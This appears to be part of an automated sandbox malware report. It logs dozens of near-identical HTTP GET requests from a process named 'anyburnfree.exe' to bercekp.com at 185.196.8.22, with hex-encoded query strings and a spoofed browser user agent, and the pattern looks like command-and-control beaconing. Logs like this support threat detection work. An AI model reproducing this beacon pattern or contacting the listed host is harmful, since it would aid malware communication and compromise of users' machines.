                                                                                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: e67b680813008c20


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    32192.168.2.349776185.196.8.22802324C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Feb 8, 2024 19:10:00.400353909 CET318OUTGET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1
                                                                                                                                                                    Host: bercekp.com
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                    Feb 8, 2024 19:10:00.637063980 CET220INHTTP/1.1 200 OK
                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:10:00 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: e67b680813008c20


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    33192.168.2.349777185.196.8.22802324C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Feb 8, 2024 19:10:01.103001118 CET318OUTGET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1
                                                                                                                                                                    Host: bercekp.com
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                    Feb 8, 2024 19:10:01.339915037 CET220INHTTP/1.1 200 OK
                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:10:01 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: e67b680813008c20


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    34192.168.2.349778185.196.8.22802324C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Feb 8, 2024 19:10:01.852536917 CET318OUTGET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1
                                                                                                                                                                    Host: bercekp.com
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                    Feb 8, 2024 19:10:02.089179993 CET220INHTTP/1.1 200 OK
                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:10:01 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: e67b680813008c20


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    35192.168.2.349779185.196.8.22802324C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Feb 8, 2024 19:10:02.455610991 CET318OUTGET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1
                                                                                                                                                                    Host: bercekp.com
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                    Feb 8, 2024 19:10:02.692017078 CET220INHTTP/1.1 200 OK
                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:10:02 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: e67b680813008c20


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    36192.168.2.349780185.196.8.22802324C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Feb 8, 2024 19:10:03.051700115 CET318OUTGET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1
                                                                                                                                                                    Host: bercekp.com
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                    Feb 8, 2024 19:10:03.289273024 CET220INHTTP/1.1 200 OK
                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:10:03 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: e67b680813008c20


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    37192.168.2.349781185.196.8.22802324C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Feb 8, 2024 19:10:03.703100920 CET318OUTGET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1
                                                                                                                                                                    Host: bercekp.com
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                    Feb 8, 2024 19:10:03.939701080 CET220INHTTP/1.1 200 OK
                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:10:03 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: e67b680813008c20


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    38192.168.2.349782185.196.8.22802324C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Feb 8, 2024 19:10:04.576409101 CET318OUTGET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1
                                                                                                                                                                    Host: bercekp.com
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                    Feb 8, 2024 19:10:04.812911034 CET220INHTTP/1.1 200 OK
                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:10:04 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: e67b680813008c20


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    39192.168.2.349783185.196.8.22802324C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Feb 8, 2024 19:10:05.181233883 CET318OUTGET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1
                                                                                                                                                                    Host: bercekp.com
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                    Feb 8, 2024 19:10:05.417701006 CET220INHTTP/1.1 200 OK
                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:10:05 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: e67b680813008c20


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    40192.168.2.349784185.196.8.22802324C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Feb 8, 2024 19:10:05.754904985 CET318OUTGET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1
                                                                                                                                                                    Host: bercekp.com
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                    Feb 8, 2024 19:10:05.991764069 CET220INHTTP/1.1 200 OK
                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:10:05 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: e67b680813008c20


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    41192.168.2.349785185.196.8.22802324C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Feb 8, 2024 19:10:06.416985989 CET318OUTGET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1
                                                                                                                                                                    Host: bercekp.com
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                    Feb 8, 2024 19:10:06.653738022 CET220INHTTP/1.1 200 OK
                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:10:06 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: e67b680813008c20


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    42192.168.2.349786185.196.8.22802324C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Feb 8, 2024 19:10:07.004520893 CET318OUTGET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1
                                                                                                                                                                    Host: bercekp.com
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                    Feb 8, 2024 19:10:07.241362095 CET220INHTTP/1.1 200 OK
                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:10:07 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: e67b680813008c20


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    43192.168.2.349787185.196.8.22802324C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Feb 8, 2024 19:10:07.601890087 CET318OUTGET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1
                                                                                                                                                                    Host: bercekp.com
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                    Feb 8, 2024 19:10:07.838567019 CET220INHTTP/1.1 200 OK
                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:10:07 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: e67b680813008c20


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    44192.168.2.349788185.196.8.22802324C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Feb 8, 2024 19:10:08.302710056 CET318OUTGET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1
                                                                                                                                                                    Host: bercekp.com
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                    Feb 8, 2024 19:10:08.539542913 CET220INHTTP/1.1 200 OK
                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:10:08 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: e67b680813008c20


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    45192.168.2.349789185.196.8.22802324C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Feb 8, 2024 19:10:08.972047091 CET318OUTGET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1
                                                                                                                                                                    Host: bercekp.com
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                    Feb 8, 2024 19:10:09.209367037 CET220INHTTP/1.1 200 OK
                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:10:09 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: e67b680813008c20


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    46192.168.2.349790185.196.8.22802324C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Feb 8, 2024 19:10:09.579087973 CET318OUTGET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1
                                                                                                                                                                    Host: bercekp.com
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                    Feb 8, 2024 19:10:09.815922022 CET220INHTTP/1.1 200 OK
                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:10:09 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: e67b680813008c20


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    47192.168.2.349792185.196.8.22802324C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Feb 8, 2024 19:10:10.204024076 CET318OUTGET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1
                                                                                                                                                                    Host: bercekp.com
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                    Feb 8, 2024 19:10:10.440552950 CET220INHTTP/1.1 200 OK
                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:10:10 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: e67b680813008c20


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    48192.168.2.349793185.196.8.22802324C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Feb 8, 2024 19:10:10.896689892 CET318OUTGET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1
                                                                                                                                                                    Host: bercekp.com
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                    Feb 8, 2024 19:10:11.133341074 CET220INHTTP/1.1 200 OK
                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:10:11 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: e67b680813008c20
                                                                                                                                                                    Feb 8, 2024 19:10:11.267087936 CET318OUTGET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1
                                                                                                                                                                    Host: bercekp.com
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                    Feb 8, 2024 19:10:11.503925085 CET220INHTTP/1.1 200 OK
                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:10:11 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: e67b680813008c20


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    49192.168.2.349795185.196.8.22802324C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Feb 8, 2024 19:10:12.094712019 CET318OUTGET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1
                                                                                                                                                                    Host: bercekp.com
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                    Feb 8, 2024 19:10:12.332282066 CET220INHTTP/1.1 200 OK
                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:10:12 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: e67b680813008c20


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    50192.168.2.349798185.196.8.22802324C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Feb 8, 2024 19:10:12.776079893 CET318OUTGET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1
                                                                                                                                                                    Host: bercekp.com
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                    Feb 8, 2024 19:10:13.012537003 CET220INHTTP/1.1 200 OK
                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:10:12 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: e67b680813008c20


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    51192.168.2.349800185.196.8.22802324C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Feb 8, 2024 19:10:13.441587925 CET318OUTGET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1
                                                                                                                                                                    Host: bercekp.com
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                    Feb 8, 2024 19:10:13.678770065 CET220INHTTP/1.1 200 OK
                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:10:13 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: e67b680813008c20


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    52192.168.2.349801185.196.8.22802324C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
